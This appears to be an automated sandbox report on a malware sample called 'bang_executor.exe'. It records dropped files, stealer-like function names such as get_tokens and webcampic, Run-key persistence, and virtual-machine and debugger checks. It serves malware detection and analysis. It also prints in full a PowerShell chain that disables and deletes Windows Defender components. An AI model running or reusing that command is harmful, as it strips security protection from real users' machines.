          Source: Binary string: System.Configuration.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BA7000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352625A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbj source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb8 source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B4F000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb3 source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb@k source: WERF485.tmp.dmp.34.dr
          Source: Binary string: bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb- source: bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pC:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.pdb< source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbicy source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdbpHp source: WERB52A.tmp.dmp.25.dr
          Source: Binary string: indoC:\Windows\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: bang_executor.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: bang_executor.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: bang_executor.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: bang_executor.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: bang_executor.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

          Source: bang_executor.exe.0.dr, Program.cs .Net Code: LoadDll System.Reflection.Assembly.Load(byte[])
          Source: bang_executor.exe.0.dr, Program.cs .Net Code: password
          Source: bang_executor.exe.0.dr, Program.cs .Net Code: webcampic
          Source: bang_executor.exe.0.dr, Program.cs .Net Code: select_cam
          Source: bang_executor.exe.0.dr, Program.cs .Net Code: get_cams
          Source: bang_executor.exe.0.dr, Program.cs .Net Code: get_tokens
          Source: bang_executor.exe.0.dr Static PE information: 0xD6D709DC [Mon Mar 20 18:56:28 2084 UTC]
          Source: C:\Users\user\Desktop\bang_executor.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4302656
          Source: bang_executor.exe Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_0050125A push ecx; ret 0_2_0050126D
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_00501DB0 push ecx; ret 0_2_00501DC3

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
          Source: C:\Users\user\Desktop\bang_executor.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
          Source: C:\Users\user\Desktop\bang_executor.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe
          Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bang_executor
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\bang_executor.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: 23077560000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: 23078F80000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe	Memory allocated: EF0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe	Memory allocated: 1ACA0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: 23B86490000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: 23B9FE50000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: 1350BDE0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: 13525660000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: 21D60FF0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: 21D7AAB0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe	Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3105
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5600
          Source: C:\Users\user\Desktop\bang_executor.exe	Evasive API call chain: GetLocalTime,DecisionNodes	graph_0-24534
          Source: C:\Users\user\Desktop\bang_executor.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-25719
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7592	Thread sleep count: 143 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7584	Thread sleep count: 133 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe TID: 7324	Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7748	Thread sleep count: 206 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7748	Thread sleep count: 183 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep count: 3105 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep count: 5600 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988	Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7440	Thread sleep count: 74 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7440	Thread sleep count: 275 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 8148	Thread sleep count: 283 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 8148	Thread sleep count: 115 > 30
          Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
          Source: C:\Users\user\Desktop\bang_executor.exe	File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_004EC4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_004EC4A8
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_004FE560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_004FE560
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_00500B80 VirtualQuery,GetSystemInfo,	0_2_00500B80
          Source: Amcache.hve.25.dr	Binary or memory string: VMware
          Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.25.dr	Binary or memory string: vmci.syshbin
          Source: Amcache.hve.25.dr	Binary or memory string: VMware, Inc.
          Source: Amcache.hve.25.dr	Binary or memory string: VMware20,1hbin@
          Source: Amcache.hve.25.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.25.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.25.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: bang_executor.exe, 00000000.00000002.1635605168.0000000005014000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: Amcache.hve.25.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.25.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.25.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.25.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: bang_executor.exe, 00000020.00000002.1821708093.0000021D60EEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: bang_executor.exe, 0000001C.00000002.1779420733.000001350BCD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
          Source: bang_executor.exe, 00000003.00000002.1777736692.00000230774AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM
          Source: Amcache.hve.25.dr	Binary or memory string: vmci.sys
          Source: Amcache.hve.25.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: bang_executor.exe, 00000000.00000002.1635605168.0000000005014000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Amcache.hve.25.dr	Binary or memory string: vmci.syshbin`
          Source: Amcache.hve.25.dr	Binary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.25.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.25.dr	Binary or memory string: VMware20,1
          Source: Amcache.hve.25.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.25.dr	Binary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.25.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.25.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.25.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.25.dr	Binary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.25.dr	Binary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual RAM
          Source: Amcache.hve.25.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: bang_executor.exe, 00000013.00000002.1765725139.0000023B86327000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
          Source: Amcache.hve.25.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\bang_executor.exe	API call chain: ExitProcess graph end node	graph_0-24694
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Process queried: DebugPort
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_0050647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0050647F
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_0050A640 mov eax, dword ptr fs:[00000030h]	0_2_0050A640
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_0050E680 GetProcessHeap,	0_2_0050E680
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Process token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_0050215D SetUnhandledExceptionFilter,	0_2_0050215D
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_005012D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_005012D7
          Source: C:\Users\user\Desktop\bang_executor.exe	Code function: 0_2_00501FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00501FCA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe	Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ep bypass .\test.ps1;
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
